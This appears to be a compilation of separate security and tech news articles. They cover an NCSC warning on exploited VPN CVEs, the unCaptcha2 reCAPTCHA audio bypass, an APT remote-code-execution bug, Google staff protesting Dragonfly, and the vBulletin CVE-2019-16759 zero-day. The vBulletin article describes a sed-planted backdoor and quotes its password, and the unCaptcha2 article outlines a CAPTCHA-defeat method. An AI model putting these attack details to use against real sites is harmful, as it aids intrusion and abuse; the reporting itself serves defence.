Last week, the National Cyber Security Centre (NCSC) reported that they are investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities in VPN products. These VPN products are from vendors like Pulse secure, Palo Alto and Fortinet. It is an ongoing activity, targeted to the UK and other international organizations. According to NCSC, affected sectors include government, military, academic, business and healthcare. Vulnerabilities exist in several SSL VPN products As per the report, vulnerabilities exist in several SSL VPN products that can allow an attacker to retrieve arbitrary files containing authentication credentials. An attacker can use these stolen credentials to connect to the VPN and change configuration settings or connect to further internal infrastructure. The report also highlights that unauthorized connection to a VPN can provide the attacker with the privileges needed to run secondary exploits aimed at accessing a root shell. Read Also: MITRE’s 2019 CWE Top 25 most dangerous software errors list released Top Vulnerabilities in VPN exploited by APTs The highest-impact vulnerabilities known to be exploited by APTs are listed below: Pulse Connect Secure: CVE-2019-11510: Pre-auth arbitrary file reading CVE-2019-11539: Post-auth command injection Fortinet: CVE-2018-13379: Pre-auth arbitrary file reading CVE-2018-13382: Allows an unauthenticated attacker to change the password of an SSL VPN web portal user CVE-2018-13383: Post-auth heap overflow. This allows an attacker to gain a shell running on the router Palo Alto: CVE-2019-1579: Palo Alto Networks GlobalProtect Portal NCSC suggests that users of these VPN products should investigate their logs for evidence of compromise, especially if the security patches were not applied immediately after their release. Additionally, administrators should look for evidence of compromised accounts in active use, such as anomalous IP locations or times. The report also covers product-specific advice to detect exploitation in VPN connections. Steps to mitigate the vulnerabilities in VPN NCSC provides essential steps to be taken to mitigate the risk of these vulnerabilities. They suggest that owners of vulnerable products should take two steps promptly: Apply the latest security patches released by vendors Reset authentication credentials associated with affected VPNs and accounts connecting through them The most effective way to mitigate the risk of actors exploiting these vulnerabilities is to ensure that the affected products are patched with the latest security updates. Pulse secure, Palo Alto and Fortinet have released patches for these vulnerabilities. NCSC also emphasizes on reporting any current activity related to these threats at incidents@ncsc.gov.uk where they will offer help and guidance. On Hacker News, this report has gained significant traction and users are discussing the nature of various VPN products and services. One of them commented, “Commercial enterprise VPN products are an open sewer, and there aren't any, from any vendor, that I trust. I don't like OpenVPN or strongSwan, but you'd be better off with either of them than you would be with a commercial VPN appliance. The gold standard, as ever, is Wireguard.” To know more about this report, check out the official NCSC website. An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices 10 times ethical hackers spotted a software vulnerability and averted a crisis A Cargo vulnerability in Rust 1.25 and prior makes it ignore the package key and download a wrong dependency VLC media player affected by a major vulnerability in a 3rd library, libebml; updating to the latest version may help

A team of researchers at the University of Maryland released unCaptcha2 last week, an updated version of their tool Uncaptcha that defeated Google's reCAPTCHA audio challenge with 85.15% accuracy in 2017. Google’s Audio challenge is aimed at solving reCAPTCHA's accessibility problem for visually challenged people who can’t see where to "tick the box" to prove that they’re a human and not a robot. Hence, they’re offered an option to listen to the audio and enter what they hear as a response. UnCaptcha, which was released in 2017, managed to pass the reCAPTCHA audio system by using an approach that involved downloading the audio and segmenting it. These segments were then uploaded to multiple speech-to-text services, which in turn would convert the message.                                                            unCaptcha Finally, the response obtained would be typed into the reCAPTCHA form to solve the challenge. However, after the attack in 2017, Google updated the reCAPTCHA form by introducing changes such as improved browser automation detection and using spoken phrases instead of digits for reCAPTCHA. These changes managed to successfully protect reCAPTCHA from the 2017 unCaptcha attack but failed to protect it from the new unCaptcha2. “As of June 2018, these challenges have been solved. The reCAPTCHA team..is..fully aware of this attack. The team has allowed us to release the code. The code now only needs to make a single request to a free, publicly available speech to text API (by Google) to achieve around 90% accuracy over all the captchas”, states the team. UnCaptcha2 makes use of a screen clicker that helps it move to certain pixels on the screen and move around the webpage as a human would. However, this method is not very robust and still needs more working. Also, unCaptcha2 uses a different approach than the first version and no longer requires the use of multiple speech-to-text engines as well as the segmentation approach. UnCaptcha2 involves navigating to Google's ReCaptcha Demo site, navigating to audio challenge for reCAPTCHA and then downloading the audio challenge. After this step, the audio challenge is submitted to Speech To Text services. Finally, the response obtained is typed in and submitted to solve the challenge. “unCaptcha2, like the original version, is meant to be a proof of concept. As Google updates its service, this repository will not be updated. As a result, it is not expected to work in the future, and is likely to break at any time,” state the researchers. Google launches score-based reCAPTCHA v3 to filter abusive traffic on websites Google’s secret Operating System ‘Fuchsia’ will run Android Applications: 9to5Google Report Google Cloud releases a beta version of SparkR job types in Cloud Dataproc

Yesterday a remote code execution bug was found in the APT high-level package manager used by Debian, Ubuntu, and other related Linux distributions. Max Justicz, the security researcher who discovered the bug, says that the bug "allows a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code as root on a machine installing any package.” Justicz’s blog post states that the vulnerable versions of APT don't properly sanitize certain parameters during HTTP redirects. An attacker can take advantage of this and perform a remote man-in-the-middle attack to inject malicious content, thus tricking the system to install certain altered packages. HTTP redirects while using apt-get command help Linux machines to automatically request packages from an appropriate mirror server when other servers are unavailable. If the first server fails, it returns the location of the next server from where the client should request the package. Justicz has also demonstrated this man-in-the-middle attack in a short video: https://justi.cz/assets/aptpoc.mp4 Justicz told The Hacker News that a malicious actor intercepting HTTP traffic between APT utility and a mirror server, or just a malicious mirror, could execute arbitrary code on the targeted system with the highest level of privileges, i.e. root. He further adds, "You can completely replace the requested package, as in my proof of concept. You could substitute a modified package as well if you wanted to”. The APT is also used by major Linux distributions like Debian and Ubuntu, who have also acknowledged and released security patches for this vulnerability. Hacker News also points how this flaw comes around the time when cybersecurity experts are fighting over Twitter, in favor of not using HTTPS and suggesting software developers to rely on signature-based package verification since the APT on Linux also does the same. They further add that the APT exploitation could have been mitigated if the software download manager was strictly using HTTPS to communicate securely. The developers of APT have released version 1.4.9 that fixes the issue. The bug has also been fixed in APT 1.2.29ubuntu0.1, 1.7.0ubuntu0.1, 1.0.1ubuntu2.19, and 1.6.6ubuntu0.1 packages, as well as in APT 1.4.9 for the Debian distribution. You can head over to Max Justicz official blog for more insights on this news. Kali Linux 2018 for testing and maintaining Windows security – Wolf Halton and Bo Weaver [Interview] Black Hat hackers used IPMI cards to launch JungleSec Ransomware, affects most of the Linux servers Homebrew 1.9.0 released with periodic brew cleanup, beta support for Linux, Windows and much more!

About a thousand Google employees frustrated with a series of controversies involving Google have signed a letter to demand transparency on building a censored search engine for China. The project named Dragonfly is a censored search engine for the Chinese market. In the letter employees mentioned, “Currently we do not have the information required to make ethically-informed decisions about our work, our projects, and our employment.” The letter published by the Buzzfeed news was circulated on Google’s internal communications system and is signed by about 1400 Googlers. The Dragonfly project will be Google’s return to China after 8 years of withdrawal from its decision to protest against censorship and government hacking. China has the world’s largest internet audience but has frustrated American tech giants with content restrictions or outright blockages of services including Facebook and Instagram. Crisis already hailing in Google This is not the first time Google’s outspoken workforce has been agitated by changes in strategy. In April, the internet company’s employees spoke out against its involvement in a Pentagon program that uses artificial intelligence to improve weaponry. Over 4,000 employees signed a petition asking the company to cancel it. A dozen engineers resigned in protest, and Google eventually promised not to renew the contract. Following that uproar, Google published AI ethics guidelines for the company. The letter about Dragonfly that's currently being circulated inside the company, argues that those guidelines are not enough and employees further added, "As a company and as individuals we have a responsibility to use this power to better the world, not to support social control, violence, and oppression," the letter reads. "What is clear is that Ethical Principles on paper are not enough to ensure ethical decision making. We need transparency, oversight, and accountability mechanisms sufficient to allow informed ethical choice and deliberation across the company." What does Google’s management say Allison Day, a program manager at Google is not shocked by this outrage and says to the Buzzfeed news, “I can see the bottom line for any corporation is growth, and [China] represented a gigantic market,” she said. “The ‘Don’t be Evil’ slogan or whatever is, you know… It’s not a farce. I wouldn’t go so far as to say that. But it is a giant corporation, and its bottom line is to make money.” Google CEO Sundar Pichai has repeatedly expressed interest in the company making a return to China, which it pulled out of for political reasons in 2010. Pichai’s apparent decision to return, which was not addressed companywide before Thursday, has caused some employees to consider leaving the company altogether. “There are questions about how [Dragonfly] is implemented that could make it less concerning, or much more concerning,” an anonymous Google employee said. “That will continue to be on my mind, and the mind of other Googlers deciding whether to stay.” The Dragonfly project secrecy Two Google employees who were working on Dragonfly were so disturbed by the secrecy that they quit the team over it. Developers who were working on the project had been asked to keep Dragonfly confidential — not just from the public, but also from their coworkers. Even more upsetting to some employees is the fact that the company has blocked off internal access to Dragonfly’s code. Managers also shut down access to certain documents pertaining to the project, according to the Intercept. Employees feel that this is a special kind of betrayal and erosion of trust because they talk and act like, “Once you’re at Google, you can look up the code anywhere in the code base and see for yourself.” “We pride ourselves on having an open and transparent culture,” said the anonymous Google developer. “There [are] definitely employees at the company who are very frustrated because that’s clearly not true.” Google has not responded to specific questions about Dragonfly from the Intercept, nor to Bloomberg, nor to BuzzFeed News, only saying in a statement, “We don’t comment on speculation about future plans.” An anonymous Google developer said, “Even though a lot of us have really good jobs, we can see that the difference between us and the leadership is still astronomical. The vision they have for the future is not our vision.” Google releases new political ads library as part of its transparency report Google is missing out $50 million because of Fortnite’s decision to bypass Play Store Google’s censored Chinese search engine is a stupid, stupid move, says former exec Lokman Tsui

Update: Six days after an anonymous researcher had disclosed a zero-day pre-auth remote code execution vulnerability in vBulletin, Cloudflare has deployed a new rule within their Cloudflare Specials Rulesets (ruleId: 100166).  The Cloudflare team states, “We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10. Protection against common RCE attacks is a standard feature of Cloudflare's Managed Rulesets.” Cloudflare customers with Managed Rulesets and Cloudflare Specials can be protected against this vulnerability by enabling the WAF Managed Rulesets in the Firewall tab of Cloudflare. Head over to the Cloudflare blog for more details about Cloudflare’s protection against this vulnerability. On September 23rd, an anonymous researcher published a zero-day pre-authentication remote code execution vulnerability in vBulletin, which allows an attacker to remotely execute malicious shell commands on any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability was disclosed on Full Disclosure, a public access mailing list. Yesterday, the vBulletin team issued a security patch for this vulnerability, which is now tracked under the CVE-2019-16759. How does the zero-day vulnerability in vBulletin work Ryan Seguin, a research engineer at Tenable explains in his blog that this vulnerability utilizes default vBulletin configurations. This enables an unauthenticated attacker to send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. He further states, “These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.” Another security researcher, Troy Mursch of the Bad Packets security intelligence service told Arstechnica that the attackers are employing botnets to actively exploit vulnerable servers. The exploit, Mursch says, can modify the includes/vb5/frontend/controller/bbcode.php via the "sed" command to add a backdoor to the code. Mursch adds, “This is done by setting a “password” (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site. The vulnerability itself has been regarded by some as a backdoor.” The vBulletin vulnerability is exploiting websites via the backdoor to build a list of bots that can configure supplementary ways of exploiting the infected hosts. The backdoor can infect the compromised hosts with DDoS malware and conduct denial-of-service attacks. It is not known yet if the anonymous publisher of this vulnerability had reported the vulnerability to the vBulletin team or not. Another possibility is that the vBulletin team could not find a timely solution to this issue, encouraging the user to publish the vulnerability on Full Disclosure. The anonymous researcher has published about the zero-day vulnerability from an unnamed email service. Why is a vulnerability in vBulletin so severe? vBulletin, a popular web forum software package has around 0.1% market share of all the running forums across the internet. Though the percentage looks small, the vulnerability in vBulletin can impact billions of internet users, reports ZDNet. vBulletin is designed to collect user information about registered users. “While billions of internet sites don't store any info about users, a handful of online forums could very easily store data on most internet users. Therefore, a market share of 0.1% is actually pretty significant, when we factor in how many users could be registered on these forums.” Steam, EA, Zynga, NASA, Sony, BodyBuilding.com, the Houston Texans, and the Denver Broncos are some of the customers that use the vBulletin server. Yesterday, GreyNoise, a cybersecurity company has tweeted that the vBulletin hackers are actively using this vulnerability to attack vulnerable forums. https://twitter.com/GreyNoiseIO/status/1176898873622781954 According to Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, the vulnerability is known for many years. https://twitter.com/cBekrar/status/1176803541047861249 The vBulletin team has already issued a patch for CVE-2019-16759 for vBulletin versions 5.5.2, 5.5.3, and 5.5.4. Users on earlier versions of vBulletin 5.x are advised to update to one of the supported versions in order to implement the patch. The vBulletin cloud version has already updated and fixed this issue. Silicon-Interconnect Fabric is soon on its way to replace Printed Circuit Boards, new UCLA research claims Google Chrome Keystone update can render your Mac system unbootable ReactOS 0.4.12 releases with kernel improvements, Intel e1000 NIC driver support, and more